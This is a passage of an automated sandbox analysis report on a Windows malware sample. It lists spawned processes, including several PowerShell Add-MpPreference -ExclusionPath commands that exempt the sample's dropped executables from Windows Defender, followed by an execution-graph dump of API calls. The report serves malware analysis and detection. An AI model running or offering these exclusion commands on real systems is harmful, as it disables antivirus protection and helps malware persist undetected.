                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:32
                                                                                                                  Start time:14:22:27
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Imagebase:0x350000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:33
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:34
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:35
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:36
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:37
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:38
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:39
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:40
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:41
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:42
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:43
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:44
                                                                                                                  Start time:14:22:29
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:45
                                                                                                                  Start time:14:22:30
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat"
                                                                                                                  Imagebase:0x7ff74daa0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:46
                                                                                                                  Start time:14:22:30
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:47
                                                                                                                  Start time:14:22:31
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff69c730000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:48
                                                                                                                  Start time:14:22:32
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff781730000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:49
                                                                                                                  Start time:14:22:37
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:50
                                                                                                                  Start time:14:22:42
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                                                                                                  Imagebase:0x450000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:51
                                                                                                                  Start time:14:22:43
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1504
                                                                                                                    Total number of Limit Nodes:29
24511->24515 24519 5be65 SetDlgItemTextW 24512->24519 24514->24477 24521 5b8fd IsDialogMessageW 24514->24521 24747 5d4d4 24515->24747 24517->24477 24525 4e617 53 API calls 24518->24525 24524 5be79 24519->24524 24521->24507 24522 5b90c TranslateMessage DispatchMessageW 24521->24522 24522->24507 24523 5b9d9 24651 4a0b1 24523->24651 24527 4e617 53 API calls 24524->24527 24526 5ba17 24525->24526 24532 44092 _swprintf 51 API calls 24526->24532 24560 5be9c _wcslen 24527->24560 24530 5c020 24540 5c73f 97 API calls 24530->24540 24579 5c0d8 24530->24579 24531 5bff0 24531->24530 24535 4e617 53 API calls 24531->24535 24536 5ba29 24532->24536 24533 5c73f 97 API calls 24533->24531 24539 5c003 SetDlgItemTextW 24535->24539 24542 5d4d4 16 API calls 24536->24542 24537 5ba68 GetLastError 24538 5ba73 24537->24538 24657 5ac04 SetCurrentDirectoryW 24538->24657 24543 4e617 53 API calls 24539->24543 24545 5c03b 24540->24545 24541 5c18b 24546 5c194 EnableWindow 24541->24546 24547 5c19d 24541->24547 24542->24523 24550 5c017 SetDlgItemTextW 24543->24550 24558 5c04d 24545->24558 24584 5c072 24545->24584 24546->24547 24549 5c1ba 24547->24549 24765 412d3 GetDlgItem EnableWindow 24547->24765 24548 5beed 24552 4e617 53 API calls 24548->24552 24555 5c1e1 24549->24555 24569 5c1d9 SendMessageW 24549->24569 24550->24530 24551 5ba87 24556 5ba9e 24551->24556 24557 5ba90 GetLastError 24551->24557 24552->24477 24553 5c0cb 24561 5c73f 97 API calls 24553->24561 24555->24477 24570 4e617 53 API calls 24555->24570 24562 5bb11 24556->24562 24566 5bb20 24556->24566 24571 5baae GetTickCount 24556->24571 24557->24556 24763 59ed5 32 API calls 24558->24763 24559 5c1b0 24766 412d3 GetDlgItem EnableWindow 24559->24766 24560->24548 24564 4e617 53 API calls 24560->24564 24561->24579 24565 5bd56 24562->24565 24562->24566 24572 5bed0 24564->24572 24666 412f1 GetDlgItem ShowWindow 24565->24666 24574 5bcfb 24566->24574 24575 5bcf1 24566->24575 24576 5bb39 GetModuleFileNameW 24566->24576 24567 5c066 24567->24584 
24569->24555 24570->24508 24578 44092 _swprintf 51 API calls 24571->24578 24580 44092 _swprintf 51 API calls 24572->24580 24573 5c169 24764 59ed5 32 API calls 24573->24764 24583 4e617 53 API calls 24574->24583 24575->24486 24575->24574 24757 4f28c 82 API calls 24576->24757 24586 5bac7 24578->24586 24579->24541 24579->24573 24587 4e617 53 API calls 24579->24587 24580->24548 24590 5bd05 24583->24590 24584->24553 24591 5c73f 97 API calls 24584->24591 24585 5bd66 24667 412f1 GetDlgItem ShowWindow 24585->24667 24658 4966e 24586->24658 24587->24579 24588 5c188 24588->24541 24589 5bb5f 24593 44092 _swprintf 51 API calls 24589->24593 24594 44092 _swprintf 51 API calls 24590->24594 24595 5c0a0 24591->24595 24598 5bb81 CreateFileMappingW 24593->24598 24599 5bd23 24594->24599 24595->24553 24600 5c0a9 DialogBoxParamW 24595->24600 24596 5bd70 24601 4e617 53 API calls 24596->24601 24603 5bbe3 GetCommandLineW 24598->24603 24635 5bc60 __InternalCxxFrameHandler 24598->24635 24613 4e617 53 API calls 24599->24613 24600->24486 24600->24553 24604 5bd7a SetDlgItemTextW 24601->24604 24602 5baed 24606 5baf4 GetLastError 24602->24606 24607 5baff 24602->24607 24608 5bbf4 24603->24608 24668 412f1 GetDlgItem ShowWindow 24604->24668 24606->24607 24611 4959a 80 API calls 24607->24611 24758 5b425 SHGetMalloc 24608->24758 24609 5bc6b ShellExecuteExW 24630 5bc88 24609->24630 24610 5bd8c SetDlgItemTextW GetDlgItem 24614 5bdc1 24610->24614 24615 5bda9 GetWindowLongW SetWindowLongW 24610->24615 24611->24562 24617 5bd3d 24613->24617 24669 5c73f 24614->24669 24615->24614 24616 5bc10 24759 5b425 SHGetMalloc 24616->24759 24621 5bc1c 24760 5b425 SHGetMalloc 24621->24760 24622 5bccb 24622->24575 24628 5bce1 UnmapViewOfFile CloseHandle 24622->24628 24623 5c73f 97 API calls 24625 5bddd 24623->24625 24694 5da52 24625->24694 24626 5bc28 24761 4f3fa 82 API calls 2 library calls 24626->24761 24628->24575 24630->24622 24633 5bcb7 Sleep 24630->24633 24632 5bc3f MapViewOfFile 24632->24635 24633->24622 24633->24630 
24634 5c73f 97 API calls 24638 5be03 24634->24638 24635->24609 24636 5be2c 24762 412d3 GetDlgItem EnableWindow 24636->24762 24638->24636 24640 5c73f 97 API calls 24638->24640 24639->24486 24639->24509 24640->24636 24642 4131f 24641->24642 24643 41378 24641->24643 24644 41385 24642->24644 24767 4e2e8 62 API calls 2 library calls 24642->24767 24768 4e2c1 GetWindowLongW SetWindowLongW 24643->24768 24644->24477 24644->24478 24644->24479 24647 41341 24647->24644 24648 41354 GetDlgItem 24647->24648 24648->24644 24649 41364 24648->24649 24649->24644 24650 4136a SetWindowTextW 24649->24650 24650->24644 24652 4a0bb 24651->24652 24653 4a14c 24652->24653 24655 4a175 24652->24655 24769 4a2b2 24652->24769 24654 4a2b2 8 API calls 24653->24654 24653->24655 24654->24655 24655->24537 24655->24538 24657->24551 24659 49678 24658->24659 24660 496d5 CreateFileW 24659->24660 24661 496c9 24659->24661 24660->24661 24662 4971f 24661->24662 24663 4bb03 GetCurrentDirectoryW 24661->24663 24662->24602 24664 49704 24663->24664 24664->24662 24665 49708 CreateFileW 24664->24665 24665->24662 24666->24585 24667->24596 24668->24610 24670 5c749 __EH_prolog 24669->24670 24671 5bdcf 24670->24671 24672 5b314 ExpandEnvironmentStringsW 24670->24672 24671->24623 24678 5c780 _wcslen _wcsrchr 24672->24678 24674 5b314 ExpandEnvironmentStringsW 24674->24678 24675 5ca67 SetWindowTextW 24675->24678 24678->24671 24678->24674 24678->24675 24679 63e3e 22 API calls 24678->24679 24681 5c855 SetFileAttributesW 24678->24681 24686 5cc31 GetDlgItem SetWindowTextW SendMessageW 24678->24686 24689 5cc71 SendMessageW 24678->24689 24790 51fbb CompareStringW 24678->24790 24791 5a64d GetCurrentDirectoryW 24678->24791 24793 4a5d1 6 API calls 24678->24793 24794 4a55a FindClose 24678->24794 24795 5b48e 76 API calls 2 library calls 24678->24795 24679->24678 24682 5c90f GetFileAttributesW 24681->24682 24693 5c86f __cftof _wcslen 24681->24693 24682->24678 24685 5c921 DeleteFileW 24682->24685 24685->24678 24687 5c932 24685->24687 
24686->24678 24688 44092 _swprintf 51 API calls 24687->24688 24690 5c952 GetFileAttributesW 24688->24690 24689->24678 24690->24687 24691 5c967 MoveFileW 24690->24691 24691->24678 24692 5c97f MoveFileExW 24691->24692 24692->24678 24693->24678 24693->24682 24792 4b991 51 API calls 2 library calls 24693->24792 24695 5da5c __EH_prolog 24694->24695 24796 50659 24695->24796 24697 5da8d 24800 45b3d 24697->24800 24699 5daab 24804 47b0d 24699->24804 24703 5dafe 24820 47b9e 24703->24820 24705 5bdee 24705->24634 24707 5d6a8 24706->24707 24708 5a5c6 4 API calls 24707->24708 24709 5d6ad 24708->24709 24710 5d6b5 GetWindow 24709->24710 24711 5bf15 24709->24711 24710->24711 24714 5d6d5 24710->24714 24711->24487 24711->24488 24712 5d6e2 GetClassNameW 25279 51fbb CompareStringW 24712->25279 24714->24711 24714->24712 24715 5d706 GetWindowLongW 24714->24715 24716 5d76a GetWindow 24714->24716 24715->24716 24717 5d716 SendMessageW 24715->24717 24716->24711 24716->24714 24717->24716 24718 5d72c GetObjectW 24717->24718 25280 5a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24718->25280 24721 5d743 25281 5a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24721->25281 25282 5a80c 8 API calls 24721->25282 24723 5d754 SendMessageW DeleteObject 24723->24716 24724->24499 24726 5abf1 24725->24726 24727 5abcc 24725->24727 24728 5abf6 SHAutoComplete 24726->24728 24729 5abff 24726->24729 25283 51fbb CompareStringW 24727->25283 24728->24729 24733 5b093 24729->24733 24731 5abdf 24731->24726 24732 5abe3 FindWindowExW 24731->24732 24732->24726 24734 5b09d __EH_prolog 24733->24734 24735 413dc 84 API calls 24734->24735 24736 5b0bf 24735->24736 25284 41fdc 24736->25284 24739 5b0d9 24741 41692 86 API calls 24739->24741 24740 5b0eb 24742 419af 128 API calls 24740->24742 24745 5b0e4 24741->24745 24743 5b10d __InternalCxxFrameHandler ___std_exception_copy 24742->24743 24744 41692 86 API calls 24743->24744 24744->24745 24745->24531 24745->24533 24746->24508 24748 5b568 5 API calls 24747->24748 24749 5d4e0 
GetDlgItem 24748->24749 24750 5d536 SendMessageW SendMessageW 24749->24750 24751 5d502 24749->24751 24752 5d591 SendMessageW SendMessageW SendMessageW 24750->24752 24753 5d572 24750->24753 24754 5d50d ShowWindow SendMessageW SendMessageW 24751->24754 24755 5d5c4 SendMessageW 24752->24755 24756 5d5e7 SendMessageW 24752->24756 24753->24752 24754->24750 24755->24756 24756->24523 24757->24589 24758->24616 24759->24621 24760->24626 24761->24632 24762->24639 24763->24567 24764->24588 24765->24559 24766->24549 24767->24647 24768->24644 24770 4a2bf 24769->24770 24771 4a2e3 24770->24771 24772 4a2d6 CreateDirectoryW 24770->24772 24773 4a231 3 API calls 24771->24773 24772->24771 24774 4a316 24772->24774 24775 4a2e9 24773->24775 24777 4a325 24774->24777 24782 4a4ed 24774->24782 24776 4a329 GetLastError 24775->24776 24779 4bb03 GetCurrentDirectoryW 24775->24779 24776->24777 24777->24652 24780 4a2ff 24779->24780 24780->24776 24781 4a303 CreateDirectoryW 24780->24781 24781->24774 24781->24776 24783 5ec50 24782->24783 24784 4a4fa SetFileAttributesW 24783->24784 24785 4a510 24784->24785 24786 4a53d 24784->24786 24787 4bb03 GetCurrentDirectoryW 24785->24787 24786->24777 24788 4a524 24787->24788 24788->24786 24789 4a528 SetFileAttributesW 24788->24789 24789->24786 24790->24678 24791->24678 24792->24693 24793->24678 24794->24678 24795->24678 24797 50666 _wcslen 24796->24797 24824 417e9 24797->24824 24799 5067e 24799->24697 24801 50659 _wcslen 24800->24801 24802 417e9 78 API calls 24801->24802 24803 5067e 24802->24803 24803->24699 24805 47b17 __EH_prolog 24804->24805 24841 4ce40 24805->24841 24807 47b32 24808 5eb38 8 API calls 24807->24808 24809 47b5c 24808->24809 24847 54a76 24809->24847 24812 47c7d 24813 47c87 24812->24813 24815 47cf1 24813->24815 24876 4a56d 24813->24876 24817 47d50 24815->24817 24854 48284 24815->24854 24816 47d92 24816->24703 24817->24816 24882 4138b 74 API calls 24817->24882 24821 47bac 24820->24821 24823 47bb3 24820->24823 24822 52297 86 API calls 24821->24822 
24822->24823 24826 417ff 24824->24826 24836 4185a __InternalCxxFrameHandler 24824->24836 24825 41828 24828 41887 24825->24828 24833 41847 ___std_exception_copy 24825->24833 24826->24825 24837 46c36 76 API calls __vswprintf_c_l 24826->24837 24830 63e3e 22 API calls 24828->24830 24829 4181e 24838 46ca7 75 API calls 24829->24838 24832 4188e 24830->24832 24832->24836 24840 46ca7 75 API calls 24832->24840 24833->24836 24839 46ca7 75 API calls 24833->24839 24836->24799 24837->24829 24838->24825 24839->24836 24840->24836 24842 4ce4a __EH_prolog 24841->24842 24843 5eb38 8 API calls 24842->24843 24844 4ce8d 24843->24844 24845 5eb38 8 API calls 24844->24845 24846 4ceb1 24845->24846 24846->24807 24848 54a80 __EH_prolog 24847->24848 24849 5eb38 8 API calls 24848->24849 24850 54a9c 24849->24850 24851 47b8b 24850->24851 24853 50e46 80 API calls 24850->24853 24851->24812 24853->24851 24855 4828e __EH_prolog 24854->24855 24883 413dc 24855->24883 24857 482aa 24858 482bb 24857->24858 25023 49f42 24857->25023 24861 482f2 24858->24861 24891 41a04 24858->24891 25019 41692 24861->25019 24864 482ee 24864->24861 24872 4a56d 7 API calls 24864->24872 24875 48389 24864->24875 25027 4c0c5 CompareStringW _wcslen 24864->25027 24868 483e8 24915 41f6d 24868->24915 24872->24864 24873 483f3 24873->24861 24919 43b2d 24873->24919 24931 4848e 24873->24931 24910 48430 24875->24910 24877 4a582 24876->24877 24878 4a5b0 24877->24878 25268 4a69b 24877->25268 24878->24813 24880 4a592 24880->24878 24881 4a597 FindClose 24880->24881 24881->24878 24882->24816 24884 413e1 __EH_prolog 24883->24884 24885 4ce40 8 API calls 24884->24885 24886 41419 24885->24886 24887 5eb38 8 API calls 24886->24887 24890 41474 __cftof 24886->24890 24888 41461 24887->24888 24889 4b505 84 API calls 24888->24889 24888->24890 24889->24890 24890->24857 24892 41a0e __EH_prolog 24891->24892 24904 41a61 24892->24904 24907 41b9b 24892->24907 25029 413ba 24892->25029 24894 41bc7 25032 4138b 74 API calls 24894->25032 24897 43b2d 101 API calls 
24901 41c12 24897->24901 24898 41bd4 24898->24897 24898->24907 24899 41c5a 24903 41c8d 24899->24903 24899->24907 25033 4138b 74 API calls 24899->25033 24901->24899 24902 43b2d 101 API calls 24901->24902 24902->24901 24903->24907 24909 49e80 79 API calls 24903->24909 24904->24894 24904->24898 24904->24907 24905 43b2d 101 API calls 24906 41cde 24905->24906 24906->24905 24906->24907 24907->24864 24908 49e80 79 API calls 24908->24904 24909->24906 25051 4cf3d 24910->25051 24912 48440 25055 513d2 GetSystemTime SystemTimeToFileTime 24912->25055 24914 483a3 24914->24868 25028 51b66 72 API calls 24914->25028 24916 41f72 __EH_prolog 24915->24916 24918 41fa6 24916->24918 25060 419af 24916->25060 24918->24873 24920 43b3d 24919->24920 24921 43b39 24919->24921 24930 49e80 79 API calls 24920->24930 24921->24873 24922 43b4f 24923 43b78 24922->24923 24926 43b6a 24922->24926 25191 4286b 101 API calls 3 library calls 24923->25191 24925 43baa 24925->24873 24926->24925 25190 432f7 89 API calls 2 library calls 24926->25190 24928 43b76 24928->24925 25192 420d7 74 API calls 24928->25192 24930->24922 24932 48498 __EH_prolog 24931->24932 24935 484d5 24932->24935 24942 48513 24932->24942 25217 58c8d 103 API calls 24932->25217 24933 484f5 24936 4851c 24933->24936 24937 484fa 24933->24937 24935->24933 24938 4857a 24935->24938 24935->24942 24936->24942 25219 58c8d 103 API calls 24936->25219 24937->24942 25218 47a0d 152 API calls 24937->25218 24938->24942 25193 45d1a 24938->25193 24942->24873 24943 48605 24943->24942 25199 48167 24943->25199 24946 48797 24947 4a56d 7 API calls 24946->24947 24949 48802 24946->24949 24947->24949 24948 4d051 82 API calls 24956 4885d 24948->24956 25205 47c0d 24949->25205 24951 4898b 25222 42021 74 API calls 24951->25222 24952 48992 24953 48a5f 24952->24953 24958 489e1 24952->24958 24957 48ab6 24953->24957 24970 48a6a 24953->24970 24956->24942 24956->24948 24956->24951 24956->24952 25220 48117 84 API calls 24956->25220 25221 42021 74 API calls 24956->25221 24965 
48a4c 24957->24965 25225 47fc0 97 API calls 24957->25225 24960 48b14 24958->24960 24962 4a231 3 API calls 24958->24962 24958->24965 24959 49105 24964 4959a 80 API calls 24959->24964 24960->24959 24979 48b82 24960->24979 25226 498bc 24960->25226 24961 48ab4 24966 4959a 80 API calls 24961->24966 24967 48a19 24962->24967 24964->24942 24965->24960 24965->24961 24966->24942 24967->24965 25223 492a3 97 API calls 24967->25223 24968 4ab1a 8 API calls 24971 48bd1 24968->24971 24970->24961 25224 47db2 101 API calls 24970->25224 24974 4ab1a 8 API calls 24971->24974 24992 48be7 24974->24992 24977 48b70 25230 46e98 77 API calls 24977->25230 24979->24968 24980 48cbc 24981 48e40 24980->24981 24982 48d18 24980->24982 24985 48e66 24981->24985 24986 48e52 24981->24986 25005 48d49 24981->25005 24983 48d8a 24982->24983 24984 48d28 24982->24984 24993 48167 19 API calls 24983->24993 24988 48d6e 24984->24988 24996 48d37 24984->24996 24987 53377 75 API calls 24985->24987 24989 49215 123 API calls 24986->24989 24990 48e7f 24987->24990 24988->25005 25233 477b8 111 API calls 24988->25233 24989->25005 25236 53020 123 API calls 24990->25236 24991 48c93 24991->24980 25231 49a3c 82 API calls 24991->25231 24992->24980 24992->24991 24999 4981a 79 API calls 24992->24999 24997 48dbd 24993->24997 25232 42021 74 API calls 24996->25232 25001 48df5 24997->25001 25002 48de6 24997->25002 24997->25005 24999->24991 25235 49155 93 API calls __EH_prolog 25001->25235 25234 47542 85 API calls 25002->25234 25009 48f85 25005->25009 25237 42021 74 API calls 25005->25237 25007 4a4ed 3 API calls 25010 490eb 25007->25010 25008 4903e 25212 49da2 25008->25212 25009->24959 25009->25008 25017 49090 25009->25017 25211 49f09 SetEndOfFile 25009->25211 25010->24959 25238 42021 74 API calls 25010->25238 